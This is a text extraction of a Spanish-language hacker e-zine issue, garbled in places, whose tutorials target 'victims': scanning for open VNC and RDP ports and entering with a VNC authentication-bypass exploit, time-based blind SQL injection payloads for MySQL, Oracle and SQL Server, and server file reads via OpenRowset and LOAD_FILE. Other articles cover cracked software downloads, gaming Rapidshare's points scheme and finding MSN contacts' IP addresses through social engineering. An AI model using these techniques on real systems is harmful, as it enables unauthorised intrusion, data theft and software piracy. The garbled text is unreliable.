69
! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! !

CUH E-zine 3ª Edicion

Embed Size (px)

Citation preview

  • 8/14/2019 CUH E-zine 3 Edicion

    1/69

  • 8/14/2019 CUH E-zine 3 Edicion

    2/69

    Joejdf!

    1 PORTA DA & A PENDICE3 EXPLOTA NDO PUERTOS6 CA MBIAR IP CON HIDEIP8 RA PIDSHA RE PREMIUM10 INYECCION A CIEGA S13 UTILIDA DES MSN17 CREA R Y ENCRIPTAR TROYA NO S21 CONOCIMIENTO BA SICO EXPLOITS23 INFECTA R FICHEROS EJECUTA BLES26 A PERTURA DE CARPETAS28 INTRODU CCION A L A SM II33 MA NUA L DE BA TCH

    38 PROGRA MA CION C II4 2 TRIA NGULO DE PA SCAL4 4 PROGRA MA R EN A SP4 6 TABLA DE CODIGOS CARACTERES50 PENDRIV E USB DE A RRANQUE EN LINU X53 TUTORIA L BOTONES59 TUTO FIRMA60 SETUP BIOS CMOS62 INSTALA CION DE A STERISK66 MODDING GA LLERY 3!

  • 8/14/2019 CUH E-zine 3 Edicion

    3/69

    Hacking Newbie

    Explotando Puertos CUH e-zine 3 Edicion

    Explotando Puertos By [p3ll3]

    Explotando Puertos 5900 y 3899

    Antes de empezar el tutorial tenemos queinformarnos un poco acerca de lo que vamos ahacer...En realidad este tutorial va a tratar de explicar comopodemos controlar un pc remotamente con la ayudade los administradores de las pc victimas. xD

    Que es control remoto ???Bueno en este caso vamos a tener acceso a todas lasfunciones de la pc victima como si furamosadministradores.

    Que es o que funcion cumplen los puertos que vamosa utilizar para poder tener control sobre ella ???Los puertos mencionados arriba son los que utiliza elprograma VNC para poder conectarse remotamente

    Y el puerto 3899 es el utilizado po

    a la pc (en realidad solo el 5900).

    r windows para el

    ara poder realizar la intrusin necesitamos lo

    Un scanner de puertos. (propio o el que

    El scanner de VNC (para windows solamente,

    En linux solo necesitamos el Krfb que esta

    Y sobre todo mucha paciencia.Como conocemos una victima ??

    uy fcil yo creo que ya hasta ustedes lo saben;

    map -P0 -p T:3899,5900

    RDP que cumple la misma funcin del VNC.

    Psiguiente:

    recomendara es Nmap)

    google: BoztecVNC scanner), eso si no sequieren complicar la vida.

    pre-instalado, por lo menos en Slackware en la parte de los programas de Internet.

    reMpara saber si una victima es o no vulnerablesimplemente aplicamos el siguiente comando, estoutilizando Nmap:

    n

    es lo que hace??ste comando fue escogido porque va a hacer un

    para decirle al scanner que

    ste comando nos va a devolver el siguiente

    Porque este comando y queEescaneo sencillo a esa ip y a esos puertos.-P0 => hace el escaneo a fuerza.-p => especifico puertosT: => va junto a -p y esson puertos TCP.

    Eresultado:

  • 8/14/2019 CUH E-zine 3 Edicion

    4/69

    Hacking Newbie

    Explotando Puertos CUH e-zine 3 Edicion

    Como vemos en la imagen nuestra victima cuenta

    mucha explicacin ahora como

    ienes dos opciones para entrar a la pc, la fcil y la

    con muchos puertos abiertos que pueden sertomados como vulnerabilidades pero lo que nosinteresa son las que ya he mencionado antes.

    Bueno,bueno, yahago para entrar en el pc ???Ttodava mas fcil ,xD .

    n linux podemos utilizar Krfb, la forma para entrar

    Como entro entonces??Eseria entonces:

    n este caso parece que esta protegido el VNC pero

    loit:

    para

    Ayuda de Nmap

    E

    no se preocupen que eso se puede solucionar...Para poder loguearse remotamente esta el exprealvnc_41_bypass , con la ayuda de este exploitse van a loguear sin necesidad de passwords.-Con windows solamente utilizan el scannerVNC que mencione anteriormente y lograranloguearse (si tiene clave utilizan el mismo exploit),este scanner trae otras utilidades bastante buenas

    que pueden hacer uso en caso de que no tenga esospuertos vulnerables.

    Some Common Scan Ty oot privileges)pes (* options require r* -sS TCP SYN stealth port scan (default if privileged (root))-sT TCP connect() port scan (default for unprivileged users)* -sU UDP port scan-sP ping scan (Find any reachable machines)* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)-sV Version scan probes open ports determining service & appnames/versions-sR RPC scan (use with other scan types)Some Common Options (none are required, most can be

    combined):* -O Use TCP/IP fingerprinting to guess remote operating system-p ports to scan. Example range: 1-1024,1080,6666,31337-F Only scans ports listed in nmap-services-v Verbose. Its use is recommended. Use twice for greater effect.-P0 Dont ping hosts (needed to scan www.microsoft.com andothers)* -Ddecoy_host1,decoy2[,> Hide scan using many decoys-6 scans via IPv6 rather than IPv4-T General timing policy-n/-R Never do DNS resolution/Always resolve [default: sometimesresolve>-oN/-oX/-oG Output normal/XML/grepable scan logs to

    -iL Get targets from file; Use - for stdin* -S /-e Specify source address ornetwork interfaceinteractive Go into interactive mode (then press h for help)Example: nmap -v -sS -O www.my.com 192.168.0.0/16 192.88-90.*.*

    ueno por ahora eso fue todo, espero que les haya

    Saludos

    Bservido el tutorial y que este les haya enseado o porlo menos los haya motivado a buscar formas decomo mejorar esto que acaban de leer.

    [p3ll3]

  • 8/14/2019 CUH E-zine 3 Edicion

    5/69

    Hacking Newbie

    Cambiar IP CUH e-zine 3 Edicion

    Cambiar IP con HideIP By ChUtOReCaRgAdOPrimeramente me presentare, Hola,

    para los que no me conocen soyJos pero ms conocido comoChUtOReCaRgAdO y espero que teguste este pequeo aporte que he

    hecho. Aprende cambiar tus IP y crear un reseteador

    de estas (siendo dinmicas o Esttica)

    En este manual Tratare de ensear a usar el Hide IPPlatinum, para que lo puedan usar bien yconfigurarlo de tal manera que les pueda servir dealgo, para los que no saben este soft te cambia tu IP

    o la oculta.Tambin a crear una reseteador IP dinmicas paraque no tengas hacer nada ms que apretar un .batpara que tu Ip cambie (solo para IPs dinmicas),

    Conceptos que debemos saber:IP: (Internet Protocol) es un conjunto de cuatronmeros cada uno de ellos va desde el 0 al 255,separados por puntos, con los cuales se identifica aun ordenador conectado a una red que corre bajoeste protocolo.

    Nuestra IP puede ser:

    IP Esttica (si siempre es la misma) ElIP Platinum esespecialmente para aquellos que no tienen IPDinmica (por que cambiar la IP siendo esta es muyfcil) o simplemente si quieres ser annimonavegando por la web.

    IP dinmica (si cuando reiniciamos la conexincambia). O sea si apagamos el modem odesconectamos el cable Ethernet y luego loconectamos, nuestra IP Tericamente cambia.

    1. Empezare por ensear a cambiar tu IP(especial para IP) esttica:Para esto Ocuparemos Hide IP Platinum

    Bueno para los que no saben el Hide IP-Platinum espara cambiar la IP. De modo que te asigna una IPdiferente, esto es muy til ya que puedes navegarlibremente por la red siendo annimo y lo masbueno de este soft sirve para evadir la espera enrapishare.com ya que al cambiarte la IP la base dedatos de esta Web (rapidshrare.com) no te reconoce,

    y te dar acceso directo a la descarga del archivoque quieres ahorrndote la largusima espera deeste.

    Requerimientos del Sistema:

    Windows 98/2000/XP/2003/Me 64 Megabyte Memoria 300 MHz CPU

    Lo primero que tenemos que hacer es descargar elsoft que lo puedes hacer de aquhttp://rapidshare.com/files/84262778/Hide_IP_Platinum_v.3.5___Serial.exe

    Pass: chue-zineO lo puedes buscar en el Google escribiendo estafrase (que siempre funciona) Hide IP Platinum+Crack y lo descargas, una vez que esta lista ladescarga lo descomprimes en una carpeta(seguramente tendr dos archivos, el Programa yuno de texto que es el cdigo de activacin) una vezque ya tengas listo ejecutas el archivo .exe

    Le das en siguiente, aceptar, siguiente, siguiente,siguiente, Install, finish.

    Si todo sali bien, ya estar el soft listo para serusado, una vez que ejecutes el Soft te saldr estaventana

    Tienes que darle en esta opcin, e ingresas el cdigoque est en archivo anteriormente nombrado (el detexto que viene con el programa, ese que est en la

    carpeta) una vez insertado el cdigo apretas en Oky listo,Aparecer un Icono en la barra de tareas

    http://rapidshare.com/files/84262778/Hide_IP_Platinum_v.3.5___Serial.exehttp://rapidshare.com/files/84262778/Hide_IP_Platinum_v.3.5___Serial.exehttp://rapidshare.com/files/84262778/Hide_IP_Platinum_v.3.5___Serial.exehttp://rapidshare.com/files/84262778/Hide_IP_Platinum_v.3.5___Serial.exe
  • 8/14/2019 CUH E-zine 3 Edicion

    6/69

    Hacking Newbie

    Cambiar IP CUH e-zine 3 Edicion

    Esto significa que el programa se est poniendo alda (actualizando) en este momento no debes hacer

    nada con l.Una vez que se ha actualiza en soft buscara en elproxy, una IP y te la dir

    Si te sale esto es que todo resulto bien, tu IP ha sidocambiada

    Si sale este Icono es que el IP-platiniun no ha

    encontrado ningn servidor y lo mejor es cambiar elproxy, mas adelante te enseare a cambiarlo.

    Pero primero cmbiale el Lenguaje haciendo dobleclick en el icono de la barra de tareas te vas aidioma le pones espaol y dejas tal cual lasfunciones que trae.

    Ahora explicare algunas de las funciones msimportantes que trae este soft:

    Esta opcin sale al hacer click con el botnizquierdo del mouse sobre el Icono de la barra detareas de dicho soft.

    Stop Hide IP/Hide IP: Es para detener el Hidetemporalmente, tambin lo puedes hacer con lasteclas Ctrl+W.Change Proxy: sirve para cambiar el Proxy o sea laIP. Tambin se puede hacer Ctrl + Q.My IP: abre una pg. web , en esta te muestra tu IPactual .Ctrl+DExit: Cierra el programa.Algunas Recomendaciones:Si se demora demasiado en encontrar una IP puedes

    cambiar el Proxy ej. A http://rapidshare.comY en la cadena de caracteres tienes que poner unapalabra como ej.Rapidshare.

    Pero si quieres puedes poner el que te apetezca.Pero cuidado si no sabes que poner, mejor deja todocomo esta porque si est mal el proxy el software nofuncionar.

    Si quieres bajar un archivo de http://rapishare.com yal cambiar la IP no puedes descargar el archivotienes que presionar Ctrl+Q y buscara otra IP

    Y vas probando si te funciona enhttp://rapishare.com, hasta que encuentres una quepuedas descargar al tiro pero tambin tienes que iractualizando la pg. (F5).

    Ahora les enseare a crear un reseteador de IPdinmicas:Cuando tenemos IP dinmica, significa que cada vezque conectamos la internet, nos entrega una IPnueva, pero para hacer esto, hay que reiniciar elEquipo o sacar el cable que conecta la Internet, oapagar el Modem, que es un jaleo enorme,

    Si lo que quieres es apretar un botn y que sereinicie la conexin a Internet y te cambie la IP sigueleyendo, ya que enseare a hacer un soft (es muysimple) pero que es muy til , tenemos que abrir unahoja del block de notas o cualquier editor de texto

    plano y escribimos lo siguiente:

    @echo offIpconfig/flushdnsIpconfig/releaseIpconfig/renewIpconfig /release *Con*ExitLo guardamos en el escritorio, y le ponemos elnombre que nosotros queramos pero con extensin.bat, listo ya est hecho el reseteador de IPdinmicas. Fcil No?

    Saludos, hasta la prxima.

    http://rapidshare.com/http://rapishare.com/http://rapishare.com/http://rapishare.com/http://rapishare.com/http://rapidshare.com/
  • 8/14/2019 CUH E-zine 3 Edicion

    7/69

    Hacking Newbie

    Cuenta Premium En RapidShare CUH e-zine 3 Edicion

    Crear una cuenta Premium En RapidShare By ChUtOReCaRgAdO

    COMO CREAR UNA CUENTAPREMIUM O EXTENDER UNA SI YA LATIENES EN RAPIDSHARE.COMPerdn por que no lo haba dado aconocer directamente al foro ya que

    quera algo bueno en mi primerartculo en la Cuh e-Zine (pero luego lo subo alforo).

    ES VERDAD!, como dice el titulo en las prximaslneas te enseare como crear una cuenta (sin gastarningn dinero) en este servidor de gestin dedescarga y como todos saben es uno de los mejoresy yo dira el mejor ya que es muy rpido (es porquetiene un acelerador de descarga muy bueno) y quelas mejores cosas estn alli, como los SOs No libres,software de calidad (muchos), Msica, pelculas yetc. y etc.Pero lo malo de esto es cuando No tienes una cuentaPremium ya que tienes que esperarte varias horaspara volver a bajarte un archivo (si es que bajaste

    algo de 100 Mb, adems es lo mximo que puedesdescargar con cuenta free, por que cuando uno bajaFree solo puede descargar algo igual o menor a 100Mb) pero si tienes una cuenta Premium bajas todoquieras, tener varias descargas simultneas, noesperar, sin virus, etc.Pero tambin lo puedes utilizar para compartirarchivos pesados con amigos, familiares, no es paraque siempre rompamos las reglas de copy-restrinjido.Aunque hay varis programas que tratan de evadircambiando la IP (que es el mtodo ms que se usa)

    lo mejor es tener una Cuenta Premium.Ya basta de palabrera y vamos al grano. Parapoder hacer nuestra cuenta necesitamos estesoftware Easy Rapidshare Points 3.0.

    Este con este software haremos lo siguiente (yo hastaesta parte iba muy emocionado por qu meimaginaba otra cosa pero sigue y el premio esgrande) Miren lo que hace el Easy RapidsharePoints 3.0 es ayudarte a hacer puntos, si bien sabest puedes ir subiendo cosas a esta web(Rapidshare.com) y llevar un registro de cuantas

    veces se ha descargado (pero tienes que tenercuenta Free o Premium) y te van dando un punto porcada vez que descarguen un archivo que t hassubido (pero con la cuenta Premium o free). Y para

    que nos hagamos una Premium (de un AO) o

    extender la que ya tenis, hay que acumular 8000Puntos (hartos verdad) pero con todos estos puntoste dan un ao de cuenta Premium.Lo primero que debemos hacer es bajarte este softdehttp://rapidshare.com/files/84259641/Easy_Rapidshare_Points_3.exePass:chue-zineO tal vez cuando leas esto el link este roto o tal vezla versin vaya en otra ms que la 3.0, bueno no teaflijas, te vas al Google y pones la frase mgica quea m siempre me funciona Easy Rapidshare Points

    (versin que buscas)+ crack .Una vez que lo descargas lo desempaquetas sibajaste mi archivo claro, ya que lo hice un .exe paraque no necesites software adicionales paradescomprimirlo un ejemplo es WinRar (debera estarel soft y un archivo de texto) si ests listo parainstalarlo ejecutas el .exe, si sabes Ingles Lees , perosi no, No leas, pero dice algo sobre que cierres losprogramas que tienes y ejecucin y bla, bla, lomismo que dicen todos y que nunca hago caso, heigual funcionan, apretar Next (siguiente).En esta parte Tienes que llenarlo con algunos datos y

    donde dice serial tienes que poner uno de los tantosque hay en el archivo de texto que vienes con elpaquete que descargaste (recuerdas?).Siguiente, eliges donde quieres Instalarlo, siguiente,siguiente.Listo el programa est instalado, una vez instaladono lo ocuparemos al tiro.Ahora tenemos que hacer un archivo que pese msDe 1 mega y menos de 2 Mb, lo comprimimos(recomendado), si ya tienes una cuenta Premiumseguramente sabes subir archivos, entonces lo subes,pero si no tienes una Cuenta Premium debes hacerte

    una Free (libre), si no sabes hacerte una sigueleyendo pero si sabes sltate estas estrofas.

    Hacerse una cuenta Free en Rapidshare:Abres una pg. web (con el Mozilla Firefox, InternetExplorer, Opera, tu elije el que ms te acomode)Nos vamos a: http://rapidshare.com subes el archivoque hemos creado anteriormente, para hacer esto dedebes marcar donde dice examine, buscas el archivoque hemos hecho antes y aceptar, luego seleccionaunload, esperas que se suba el archivo (el tiempo de

    espera vara segn la velocidad de conexin quetengas) .Una vez que se termine de subir te saldrn los datos;cual es el link, si quieres enviarle el link a amigos,

    http://rapidshare.com/http://rapidshare.com/http://rapidshare.com/files/84259641/Easy_Rapidshare_Points_3.exehttp://rapidshare.com/files/84259641/Easy_Rapidshare_Points_3.exehttp://rapidshare.com/http://rapidshare.com/http://rapidshare.com/files/84259641/Easy_Rapidshare_Points_3.exehttp://rapidshare.com/files/84259641/Easy_Rapidshare_Points_3.exehttp://rapidshare.com/
  • 8/14/2019 CUH E-zine 3 Edicion

    8/69

    Hacking Newbie

    Cuenta Premium En RapidShare CUH e-zine 3 Edicionpero para que nos gamos una cuenta Free tienesque irte al final de la pg. y rellenar con tus datosdonde dice user name (pones un nombre deusuario para registrarte ej. ChUtOReCaRgAdO,Email tienes que poner tu email verdadero y enpassword una contrasea y aceptas.Si esta todo correcto y te sale una pg. Como la dea continuacin, ya tienes tu cuenta Free, pero si no,es que algo quedo mal, vuelve a escribir tu nombrede usuario o contrasea.

    Escribimos los datos que hemos puestoanteriormente, tu nombre de usuario y contrasea yapretar Enter o donde dice SSL-encrypted Login , siest bien ya estarn dentro de tu cuenta free la pg.que muestra es diferente a la antes ya que ahorasale lo mismo para subir archivos pero abajo saleuna lista de los archivos que has subido con lacuenta, ahora tienes que copiar el link del archivoque subimos anteriormente, tienes que llevar elcursor donde aparece un icono de archivo de texto y

    luego presionas el botn izquierdo del mouse ycopias el link (copiar destino), ahora tenemos queabrir el Rapidshare Points, Inicio, todos losprogramas, Easy Rapidshare Points 3.0, y lo abres,copias el link en la barra de direcciones y aprestaGo, entraremos a Rapidshare, tienes que bajarte elarchivo, te vas al final de la pg. marcas donde diceFree, luego te vas al medio de la pg. y esperas unminuto, pones Las letras que aparecen y lodescargas, pero la gracia esta que cuando valla enla mitad o un poco mas all cancelas la descarga,luego repites el proceso una y otra vez.

    Es recomendable hacerlo entre hartas personas yaque se avanza mucho ms rpido.

    En 1 Minuto 1 punto30 Minutos 30 puntos1 Hora 60 puntos1 da 1440 puntos1 Mes 43.200

    PD: yo hace un mes que lo estoy intentando hacermeuna, pero para m es muy difcil ya que no tengointernet y tengo que ir a un ciber.Para ver los puntos que llevas tienes que ingresar atu cuenta a Rapidshare para ver cuntas veces se habajado el archivo.Te metes a la Web y te vas a la seccin Free Zone, yte metes en el sub-men Collector`s zone login, metestu nombre de usuario y contrasea y listo.Tambin aconsejo otro soft que les puede servir yaque puede hacer varias descargas simultneas, el

    Downlop Direct, tienes que instalarlo y aplicarle elcrack, luego lo abres :

    Y para empezar a descargar presiones donde dice ycopias el link pero este a veces lo identifica solo, ycomienza a descargar, luego haces lo mismo hastaque ya no se puede poner ninguna descarga, ycuando vallan en la mitad, lo cancelas o remuevesuno o todos, y as vas avanzando harto, pero elarchivo tiene que estar en .Zip o .rar, y este softconsume muchos recursos, si queremos encontrar elprograma que menciono nos vamos al Google y

    ponemos Download Direct+crackSaLuDos y hasta la prximaBy ChUtOReCaRgAdO

    mailto:[email protected]:[email protected]
  • 8/14/2019 CUH E-zine 3 Edicion

    9/69

    Hacking Newbie

    Inyeccion a ciegas SQL CUH e-zine 3 Edicion

    INYECCION A CIEGAS DE SQLI PARTE By Alesteir

    INYECCION A CIEGAS DE SQL -BLIND SQL INJECTIONPara nadie es un secreto que unasde las mayores vulnerabilidades de

    la red son las famosas inyeccionesSQL, pero existen variadas tcnicas y una de ellas, esla que actualmente se conoce como inyeccin aciegas de SQL (blind sql injection), este articulo esuna corta introduccin y nos ayudara a comprenderlo que son y como funcionan dichas tcnicas yalguna cosilla mas, en el siguiente numero del e-zinetrataremos la forma de explotar dichas

    vulnerabilidades.

    Inyeccin SQL

    Una inyeccin de cdigo SQL esta basada en unainteraccin de un intruso con el motor de una basede datos, en la cual el atacante puede obtener yhasta modificar los datos, e incluso el atacantepuede llegar a obtener y manipular archivos, con laconsecuencia de poder manejar los datos y elsistema a su antojo y con total libertad. Todo ello sedebe a la mala validacin y filtrado de los datosintroducidos por el usuario (Cliente), por parte de la

    aplicacin Web (Servidor) que maneja el gestor de labase de datos, de forma que el intruso puedealterar las sentencias SQL aceptadas por laaplicacin server.

    Injeccion Ciega de SQLEsta tcnica se usa cuando una web no muestra lostpicos mensajes de error de la base de datos, al nohaber un resultado positivo en una consultaespecifica, o sea que solo se enviar una respuestapor parte del servidor si el resultado es correcto. Es

    por ello que sentencias que contengan entre suscondiciones valores comparativos como 1=1 o0=1 ofrecen respuestas, bien sea respuestasnegativas o positivas, esta es la base de esta tcnica

    de inyeccin SQL. Ahora Supongamos que tenemos

    una aplicacin web, la cual usa los datos que recibepor parte del usuario (Cliente) para construirsentencias de consulta y de esta forma mostrar lainformacin pertinente (solicitando los datos alServidor), ahora resulta que llegado el punto,sabemos de su vulnerabilidad y procedemos ainyectar consultas pero no vemos los datosobtenidos, no obstante, podemos distinguircomportamientos distintos entre consultas quemuestran datos, y las que no lo hacen, es all dondebasados en valores verdadero (true) o falso (false)que son devueltos por la aplicacin, que debemos

    saber el tipo de inyeccin ciega pertinente, para deesta manera obtener los datos que deseamos poseer.Para saber si un parmetro es vulnerable a unainyeccin ciega de sql supongamos que tenemos unaweb, y la pagina 467, por decir algo un ejemplo:

    http://www.ejemplo.org/pagina.php?id=467

    Entonces aadimos abs() de la siguiente manera:

    http://www.ejemplo.org/pagina.asp?idpagina=abs(467)

    Y si la pgina se muestra correctamente sabremosque la web es vulnerable a un ataque a ciegas deinyeccin SQL.

  • 8/14/2019 CUH E-zine 3 Edicion

    10/69

    Hacking Newbie

    Inyeccion a ciegas SQL CUH e-zine 3 Edicion

    Inyeccion a ciegas basado en tiempos de respuestaLas primeras referencias en cuanto al tema las hizoChrish Anley en el documento: Advanced SQLInjection en el 2002 hacia referencia de laposibilidad de realizar ataques a ciegas basado entiempos de respuesta , en dicho documento el

    explicaba cdigos, mtodos y practicas para hacerconsultas sin importar si obtenamos resultadospalpables, e indefectiblemente saber si eran ciertaso no, todo ello dependiendo, de el tiempo en que elmotor de la base de datos tardaba en dar larespectiva respuesta a la consulta. A partir de all seempez a indagar por parte de otras mentesinquietas, pronto se descubrieron parmetrosvulnerables a inyeccin SQL, de forma que sinnecesidad de ver los resultados de la consulta, sepodan conseguir resultados a partir del tiempo derespuesta dado por el gestor (y con un poco de

    lgica se podan transforman en datos reales), otrosmas osados crearon herramientas para explotar(exploits) dichos parmetros vulnerables ainyecciones ciegas y hasta que con el tiempo sevolvi ya todo un tpico, a la hora de penetrar unsistema basado en consultas a un gestor de base dedatos. La tcnica consiste en generar retardos en lasinyecciones, y la mejor forma de usar estavulnerabilidad, es conociendo las funcionesespecificas cada motor de base de datos, benchmark(sleep en la versin 5 y posteriores) en mysqlm,waitfor en SQL server, DBMS_Lock.Sleep() enOracle; por nombrar solo algunas.

    Veamos pues la forma de inyectar cdigo a ciegasen distintos gestores:

    Mysql_http://server/ejemplo.php?id=35 and exists(select *from Passwords andbenchmark(8000000,md5(rand()))=0

    Mysql (versiones 5):http://server/ejemplo.asp?id=35 and exists(select *from Passwords) and sleep(8)

    Oracle:http://server/ejemplo.php?id=1; begin if (exists(select* from Passwords)) then dbms_lock.sleep(8); end if;end;

    Microsoft SQL Server :http://server/ejemplo.php?id=35; if (exists(select *from Passwords)) waitfor delay 0:0:8

    En la anterior consulta el motor evala si la tablaPasswords existe y si contiene registros, al cumplirsela condicin la respuesta se retardar por un lapsode 8 segundos, es bueno recalcar que no todos losgestores permiten la tcnica de inyeccin a ciegascon retardo de tiempo

    Inyeccin a ciegas basado en tiempos de respuestausando consultas pesadasExiste otra tcnica que se basa en usar consultaspesadas, las cuales al exigir al motor de bases dedatos y de manera obvia generar un retardo detiempo ante respuestas positivas. Supongamos quesabemos cual es el parmetro vulnerable de unaconsulta y queremos saber si existe una tabla X enespecial, aqu optaramos por elaborar una consultaque solo haga trabajar al motor un tiempo extra connuestra consulta pesada si dicha sentencia cumple lacondicin de que la tabla X exista en la base de

    datos, de otra forma no lo hara y por lgica eltiempo de respuesta seria distinto, es aqu donde sedeben conocer las clausulas y el tipo de condicionesque se pueden llegar a manejar, (tal como sucedecon la clausula Where), para as mismo poderelaborar adecuadamente nuestro consulta , para ellose hace necesario conocer la evaluacin de lascondiciones por parte de los gestores, en el caso dela clausula Where , si la clusula tiene encadenadasus condiciones por operadores de tipo OR laconsulta se evaluar, mientras ninguna condicindevuelva un resultado verdadero, contrariamente

    cuando estn encadenadas por operadores de tipoAND las condiciones se evaluarn mientras ningunadevuelva un valor falso, basado en este mecanismoes que se optimiza el tiempo de respuesta para lascondiciones, es por ello que los motores tienen unorden a la hora de hacer la evaluacin, pero es elprogramador quien realmente define el orden de lascondiciones en una clausula Where, veamos porejemplo la siguiente consulta:

    Select nombre from Passwords where nombre=Aleksand pass=qwerty;Select pass from Passwords where nombre=Aleks orpass=qwerty;

    En el primer caso usamos una condicin AND, si alevaluar la primera condicin obtenemos un valor

  • 8/14/2019 CUH E-zine 3 Edicion

    11/69

    Hacking Newbie

    Inyeccion a ciegas SQL CUH e-zine 3 EdicionFALSO el gestor no evaluar la otra, en la segundaconsulta con el operador OR si la primera condicines VERDADERO no se evala la siguiente condicin.Sucede que no siempre es el gestor el que realiza laoptimizacin, es entonces donde el programadordebe saber la precedencia y el mismo efectuar laoptimizacin, pudiendo ser de izquierda a derecha oviceversa.

    Actualmente los motores modernos estiman el tiempode cada condicin y evalan primero la condicionalde menos valor en tiempo real de ejecucin, estaparticularidad es la que nos permite aprovecharnosde este tipo de situacin.

    Imaginemos que tenemos el parmetro vulnerableid_usuario en alguna URL:

    http://www.ejemplo.org/pagina.asp?id_Usuario=1Con lo dicho anteriormente, si quisiramos saber siuna tabla existe realizamos ms o menos la siguienteconsulta:http://www.ejemplo.org/pagina.asp?id_Usuario=1[nuestra consulta pesada]andexists (select * fromPasswords)De lo anterior deducimos que si la tabla clavesexiste , nuestra consulta pesada se efectuaragenerando un retraso de tiempo considerable, locual nos revelar que efectivamente la tablaPasswords existe y que adems posee mas de unregistro. La eleccin de nuestra consulta pesada serla clave a la hora de saber el retardo y por endesaber si nuestra consulta ha sido efectiva. Entoncescomo elegimos nuestra consulta pesada? Larespuesta se da conociendo las tablas internas paracada gestor de base de datos, por ejemplo en SQLServer tendramos sysobjects y en Accesstendramos MSysObjects; o tablas propias de laweb vulnerable, que por obvias razones nosotrosseriamos quienes deduciramos aquellas tablas quecontienen registros, de esta forma podemos medirlos tiempos entre una consulta que cumpla lascondiciones y una que no. Podemos generarconsultas pesadas es unir tablas con otra s y otrashasta generar una cantidad grande de registros deforma que tan que obliguen al servidor a consumirun tiempo medible en procesarlo. Para ello bastacon conocer o averiguar o adivinar una tabla delsistema de bases de datos, que tenga algn registro,y unirla consigo misma hasta generar un tiempomedible. Vamos a ver algunos ejemplos.Segn lo dicho anteriormente podemos hacer lasiguiente consulta en la cual se invierte la condicin yas poder comparar los tiempos entre cada una deellas:

    http://www.ejemplo.org/pagina.asp?id_Usuario=1[nuestra consulta pesada]and not exists (select *from claves)

    Otras tcnicas de Blind SQL InjectionDe esta forma ya sabemos que podemos consultar aciegas cada uno de los elementos del motor de una

    base de datos vulnerable, es lgico quedependiendo todo ello de los tipos de privilegios dela cuenta con que accedamos al servidor. Tambinexisten otro tipo de tcnicas que nos permitenhacernos con archivos directamente del sistemaoperativo del servidor, con esto ya tenemos casi queun acceso total a la web. Existen distintas funcionesen cada gestor por ejemplo en Microsoft SQL Server

    2005 tenemos las funciones OpenRowset y BULK quese manejan combinadas, he aqu dos ejemplos :

    http://www.ejemplo.org/pagina.php?id=1 and (selectdatalength(Z) from OpenRowset(BULK 'c:\Boot.ini',SINGLE_CLOB) as t(Z)) >1

    http://www.ejemplo.org/pagina.php?id=1 and(select substring(Z,{PosByte},1) fromOpenRowset(BULK 'c:\ Boot.ini', SINGLE_CLOB) ast(Z)) > 5

    Es asi como podramos automatizar el proceso yobtener todo el contenido del archivo con un cdigoque llame uno a uno los caracteres del archivo quevamos a conseguir.

    En MySQL podemos usar la funcin LOAD_FILE, lacual acepta como parmetro la ruta de el archivopero en hexadecimal. Ahora si queremos realizar unataque a el archivo c:Boot.inidebemos primero que todo convertirlo ahexadecimal: 0x633A5C626F6F742E696E69 con estopodemos proceder con la inyeccin:

    http://www.ejemplo.org/pagina.php?id=1 andmid(Load_File(0x633A5C626F6F742E696E69),1,1)=CHAR(34)

    La condicin ser positiva, si la primera letra delarchivo corresponde con el carcter ASCII 34., es asique por medio de automatizacin y de fuerza brutapodramos obtener todos los datos de un archivo,alginas herramientas se basan en este mtodoPara saber si una web es vulnerable a una inyeccinciega de sql supongamos que tenemos una web, pordecir algo un ejemplo:http://www.ejemplo.org/pagina.php?id=467Entonces aadimos abs() de la siguiente manera:

    http://www.ejemplo.org/pagina.asp?idpagina=abs(467)

    Si la pgina se muestra correctamente sabremos quela web es vulnerable.

    Para la prxima edicion queda la otra parte de estearticulo, espero que les guste!

    Suertes!!! By Alesteir

  • 8/14/2019 CUH E-zine 3 Edicion

    12/69

    Hacking Newbie

    Utilidades MSN CUH e-zine 3 Edicion

    UTILIDADES MSN >By Ra19ejecutar>cmd se nos abreuna ventana as:

    Despus a travs de ing. social,

    (deje link abajo para que

    aprendan lo que es por si acaso)

    le enviaremos algo:

    (Est en francs m SO pero eso no tieneimportancia)Cuando el/ella acepte en el momento de la

    transferencia abrimos el MS/DOS (lo dicho masarriba) y escribimos netstat n, el cual nos dartodas las conexiones establecidas que tiene el PC.(Se recomienda tener todo cerrado menos la ventanade la persona para tener menos conexiones y podersaber cual es)Generalmente hay mas de una IP hay que irprobando.

    Mtodo 2

    P Para esto se necesitan diferentes recursos en la PC.

    - Windows Live MSN- El PLUS de el Windows live MSN.- IP GET

    http://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://foro.el-hacker.com/index.php/topic,43462.0.html#bothttp://foro.el-hacker.com/index.php/topic,43462.0.html#bothttp://foro.el-hacker.com/index.php/topic,43462.0.html#bothttp://foro.el-hacker.com/index.php/topic,43462.0.html#bothttp://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://209.85.135.104/search?q=cache:v6BJxM